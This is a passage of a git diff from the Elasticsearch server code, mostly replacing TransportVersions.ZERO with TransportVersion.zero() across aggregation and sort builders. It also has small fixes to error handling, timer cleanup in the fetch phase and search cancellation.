a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/TermsAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/TermsAggregationBuilder.java index bfd68752621dd..122c4736c5f26 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/TermsAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/TermsAggregationBuilder.java @@ -497,6 +497,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/AvgAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/AvgAggregationBuilder.java index bc5d8be385c27..bb02c42c94b90 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/AvgAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/AvgAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.metrics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -102,6 +101,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/CardinalityAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/CardinalityAggregationBuilder.java index 560eb61c7d7a6..fbe276a0422d9 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/CardinalityAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/CardinalityAggregationBuilder.java @@ -203,6 +203,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/ExtendedStatsAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/ExtendedStatsAggregationBuilder.java index af47141730e60..709eef132d2ce 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/ExtendedStatsAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/ExtendedStatsAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.metrics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -149,6 +148,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/GeoBoundsAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/GeoBoundsAggregationBuilder.java index 244f0b0f632f8..e1c668bbe605f 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/GeoBoundsAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/GeoBoundsAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.metrics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -147,6 +146,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/GeoCentroidAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/GeoCentroidAggregationBuilder.java index 8cd5cd22a30dc..644f825c67195 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/GeoCentroidAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/GeoCentroidAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.metrics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -109,6 +108,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/MaxAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/MaxAggregationBuilder.java index d40110d77c398..8e8b8f5b8b380 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/MaxAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/MaxAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.metrics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -106,6 +105,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/MedianAbsoluteDeviationAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/MedianAbsoluteDeviationAggregationBuilder.java index ae38fd6e3d26a..b439a34d0857b 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/MedianAbsoluteDeviationAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/MedianAbsoluteDeviationAggregationBuilder.java @@ -183,6 +183,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/MinAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/MinAggregationBuilder.java index 5120a10d71822..e24e88cfbfb35 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/MinAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/MinAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.metrics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -108,6 +107,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/PercentileRanksAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/PercentileRanksAggregationBuilder.java index a6619f64943e9..1c68aa3a558be 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/PercentileRanksAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/PercentileRanksAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.metrics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.search.aggregations.AggregationBuilder; import org.elasticsearch.search.aggregations.AggregatorFactories; @@ -113,6 +112,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/PercentilesAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/PercentilesAggregationBuilder.java index b9975730bdab5..55e21518821d1 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/PercentilesAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/PercentilesAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.metrics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.search.aggregations.AggregationBuilder; import org.elasticsearch.search.aggregations.AggregatorFactories; @@ -149,6 +148,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/ScriptedMetricAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/ScriptedMetricAggregationBuilder.java index f18b7663232e0..41d2fb6fb12c1 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/ScriptedMetricAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/ScriptedMetricAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.metrics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.settings.ClusterSettings; @@ -291,7 +290,7 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/StatsAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/StatsAggregationBuilder.java index a1ad81177f47a..6c35fa909bee4 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/StatsAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/StatsAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.metrics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -113,7 +112,7 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/SumAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/SumAggregationBuilder.java index 7f6c40d78d89c..0e7145ff7b501 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/SumAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/SumAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.metrics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -106,6 +105,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/TopHitsAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/TopHitsAggregationBuilder.java index 2ec30b411928a..5263737f3b411 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/TopHitsAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/TopHitsAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.metrics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.StreamInput; @@ -820,6 +819,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/ValueCountAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/ValueCountAggregationBuilder.java index f62c0e1cc612c..5596f8a9fa3a2 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/ValueCountAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/ValueCountAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.metrics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -115,6 +114,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/WeightedAvgAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/WeightedAvgAggregationBuilder.java index 6b7790c61e73c..62abedc9f9873 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/WeightedAvgAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/WeightedAvgAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.metrics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.index.query.QueryBuilder; @@ -132,6 +131,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/AvgBucketPipelineAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/AvgBucketPipelineAggregationBuilder.java index d1b304ff5c1e6..72e7b3a051e13 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/AvgBucketPipelineAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/AvgBucketPipelineAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.pipeline; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.xcontent.XContentBuilder; @@ -65,6 +64,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/BucketScriptPipelineAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/BucketScriptPipelineAggregationBuilder.java index f141d2223d34a..9d6e004d7be4b 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/BucketScriptPipelineAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/BucketScriptPipelineAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.pipeline; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.util.Maps; @@ -212,6 +211,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/BucketScriptPipelineAggregator.java b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/BucketScriptPipelineAggregator.java index 224a39bb73d05..05943591cc026 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/BucketScriptPipelineAggregator.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/BucketScriptPipelineAggregator.java @@ -21,6 +21,7 @@ import java.util.ArrayList; import java.util.HashMap; import java.util.List; +import java.util.Locale; import java.util.Map; import static org.elasticsearch.search.aggregations.pipeline.BucketHelpers.resolveBucketValue; @@ -47,10 +48,24 @@ public class BucketScriptPipelineAggregator extends PipelineAggregator { } @Override + @SuppressWarnings({ "rawtypes", "unchecked" }) public InternalAggregation reduce(InternalAggregation aggregation, AggregationReduceContext reduceContext) { - @SuppressWarnings({ "rawtypes", "unchecked" }) - InternalMultiBucketAggregation originalAgg = - (InternalMultiBucketAggregation) aggregation; + + InternalMultiBucketAggregation originalAgg; + + if (aggregation instanceof InternalMultiBucketAggregation multiBucketAggregation) { + originalAgg = multiBucketAggregation; + } else { + throw new IllegalArgumentException( + String.format( + Locale.ROOT, + "Expected a multi bucket aggregation but got [%s] for aggregation [%s]", + aggregation.getClass().getSimpleName(), + name() + ) + ); + } + List buckets = originalAgg.getBuckets(); BucketAggregationScript.Factory factory = reduceContext.scriptService().compile(script, BucketAggregationScript.CONTEXT); diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/CumulativeSumPipelineAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/CumulativeSumPipelineAggregationBuilder.java index 75431ac44d200..28ba864458e7a 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/CumulativeSumPipelineAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/CumulativeSumPipelineAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.pipeline; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.DocValueFormat; @@ -124,6 +123,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/ExtendedStatsBucketPipelineAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/ExtendedStatsBucketPipelineAggregationBuilder.java index 52570c1466302..dba6a4b8133e6 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/ExtendedStatsBucketPipelineAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/ExtendedStatsBucketPipelineAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.pipeline; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.xcontent.XContentBuilder; @@ -102,6 +101,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/MaxBucketPipelineAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/MaxBucketPipelineAggregationBuilder.java index 1d1a51d5ddb58..f0cbec99f23cd 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/MaxBucketPipelineAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/MaxBucketPipelineAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.pipeline; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.xcontent.XContentBuilder; @@ -65,6 +64,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/MinBucketPipelineAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/MinBucketPipelineAggregationBuilder.java index 57daa8e9c0de5..f5d4d8f7e84dc 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/MinBucketPipelineAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/MinBucketPipelineAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.pipeline; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.xcontent.XContentBuilder; @@ -65,6 +64,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/PercentilesBucketPipelineAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/PercentilesBucketPipelineAggregationBuilder.java index d77178e234b53..9704896e20752 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/PercentilesBucketPipelineAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/PercentilesBucketPipelineAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.pipeline; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.xcontent.ParseField; @@ -114,7 +113,7 @@ protected XContentBuilder doXContentBody(XContentBuilder builder, Params params) @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } public static final PipelineAggregator.Parser PARSER = new BucketMetricsParser() { diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/SerialDiffPipelineAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/SerialDiffPipelineAggregationBuilder.java index 03b4867f6036b..efa4e0f943635 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/SerialDiffPipelineAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/SerialDiffPipelineAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.pipeline; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.StreamInput; @@ -231,6 +230,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/StatsBucketPipelineAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/StatsBucketPipelineAggregationBuilder.java index 4383366f5a670..bbf1dacb3c31f 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/StatsBucketPipelineAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/StatsBucketPipelineAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.pipeline; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.xcontent.XContentBuilder; @@ -65,6 +64,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/SumBucketPipelineAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/SumBucketPipelineAggregationBuilder.java index f97ded8d5e64f..9bc2e7f0cd4c3 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/SumBucketPipelineAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/SumBucketPipelineAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.pipeline; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.xcontent.XContentBuilder; @@ -65,6 +64,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/fetch/FetchPhase.java b/server/src/main/java/org/elasticsearch/search/fetch/FetchPhase.java index 0dd9cc3622fae..bd0f6ee8f66d3 100644 --- a/server/src/main/java/org/elasticsearch/search/fetch/FetchPhase.java +++ b/server/src/main/java/org/elasticsearch/search/fetch/FetchPhase.java @@ -161,17 +161,21 @@ private SearchHits buildSearchHits(SearchContext context, int[] docIdsToLoad, Pr @Override protected void setNextReader(LeafReaderContext ctx, int[] docsInLeaf) throws IOException { Timer timer = profiler.startNextReader(); - this.ctx = ctx; - this.leafNestedDocuments = nestedDocuments.getLeafNestedDocuments(ctx); - this.leafStoredFieldLoader = storedFieldLoader.getLoader(ctx, docsInLeaf); - this.leafSourceLoader = sourceLoader.leaf(ctx.reader(), docsInLeaf); - this.leafIdLoader = idLoader.leaf(leafStoredFieldLoader, ctx.reader(), docsInLeaf); - fieldLookupProvider.setNextReader(ctx); - for (FetchSubPhaseProcessor processor : processors) { - processor.setNextReader(ctx); - } - if (timer != null) { - timer.stop(); + try { + this.ctx = ctx; + this.leafNestedDocuments = nestedDocuments.getLeafNestedDocuments(ctx); + this.leafStoredFieldLoader = storedFieldLoader.getLoader(ctx, docsInLeaf); + this.leafSourceLoader = sourceLoader.leaf(ctx.reader(), docsInLeaf); + this.leafIdLoader = idLoader.leaf(leafStoredFieldLoader, ctx.reader(), docsInLeaf); + + fieldLookupProvider.setNextReader(ctx); + for (FetchSubPhaseProcessor processor : processors) { + processor.setNextReader(ctx); + } + } finally { + if (timer != null) { + timer.stop(); + } } } diff --git a/server/src/main/java/org/elasticsearch/search/internal/CancellableBulkScorer.java b/server/src/main/java/org/elasticsearch/search/internal/CancellableBulkScorer.java index 3630b57e29e42..56b470140cae3 100644 --- a/server/src/main/java/org/elasticsearch/search/internal/CancellableBulkScorer.java +++ b/server/src/main/java/org/elasticsearch/search/internal/CancellableBulkScorer.java @@ -20,7 +20,7 @@ * A {@link BulkScorer} wrapper that runs a {@link Runnable} on a regular basis * so that the query can be interrupted. */ -final class CancellableBulkScorer extends BulkScorer { +public final class CancellableBulkScorer extends BulkScorer { // we use the BooleanScorer window size as a base interval in order to make sure that we do not // slow down boolean queries @@ -32,7 +32,7 @@ final class CancellableBulkScorer extends BulkScorer { private final BulkScorer scorer; private final Runnable checkCancelled; - CancellableBulkScorer(BulkScorer scorer, Runnable checkCancelled) { + public CancellableBulkScorer(BulkScorer scorer, Runnable checkCancelled) { this.scorer = Objects.requireNonNull(scorer); this.checkCancelled = Objects.requireNonNull(checkCancelled); } diff --git a/server/src/main/java/org/elasticsearch/search/internal/ContextIndexSearcher.java b/server/src/main/java/org/elasticsearch/search/internal/ContextIndexSearcher.java index d64eb663b409c..df9e70ba49e1a 100644 --- a/server/src/main/java/org/elasticsearch/search/internal/ContextIndexSearcher.java +++ b/server/src/main/java/org/elasticsearch/search/internal/ContextIndexSearcher.java @@ -187,6 +187,11 @@ public void close() { this.cancellable.clear(); } + // clear all registered cancellation callbacks to prevent them from leaking into other phases + public void clearQueryCancellations() { + this.cancellable.clear(); + } + public boolean hasCancellations() { return this.cancellable.isEnabled(); } diff --git a/server/src/main/java/org/elasticsearch/search/rescore/QueryRescorerBuilder.java b/server/src/main/java/org/elasticsearch/search/rescore/QueryRescorerBuilder.java index b78527d93b27a..46f6089b9cccb 100644 --- a/server/src/main/java/org/elasticsearch/search/rescore/QueryRescorerBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/rescore/QueryRescorerBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.rescore; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -96,7 +95,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } /** diff --git a/server/src/main/java/org/elasticsearch/search/sort/FieldSortBuilder.java b/server/src/main/java/org/elasticsearch/search/sort/FieldSortBuilder.java index a720d2e4759d4..2d36d28b85e42 100644 --- a/server/src/main/java/org/elasticsearch/search/sort/FieldSortBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/sort/FieldSortBuilder.java @@ -702,7 +702,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } /** diff --git a/server/src/main/java/org/elasticsearch/search/sort/GeoDistanceSortBuilder.java b/server/src/main/java/org/elasticsearch/search/sort/GeoDistanceSortBuilder.java index 61d20fa72e262..d703eaed1dc95 100644 --- a/server/src/main/java/org/elasticsearch/search/sort/GeoDistanceSortBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/sort/GeoDistanceSortBuilder.java @@ -358,7 +358,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override @@ -599,7 +599,13 @@ private IndexGeoPointFieldData fieldData(SearchExecutionContext context) { throw new IllegalArgumentException("failed to find mapper for [" + fieldName + "] for geo distance based sort"); } } - return context.getForField(fieldType, MappedFieldType.FielddataOperation.SEARCH); + IndexFieldData indexFieldData = context.getForField(fieldType, 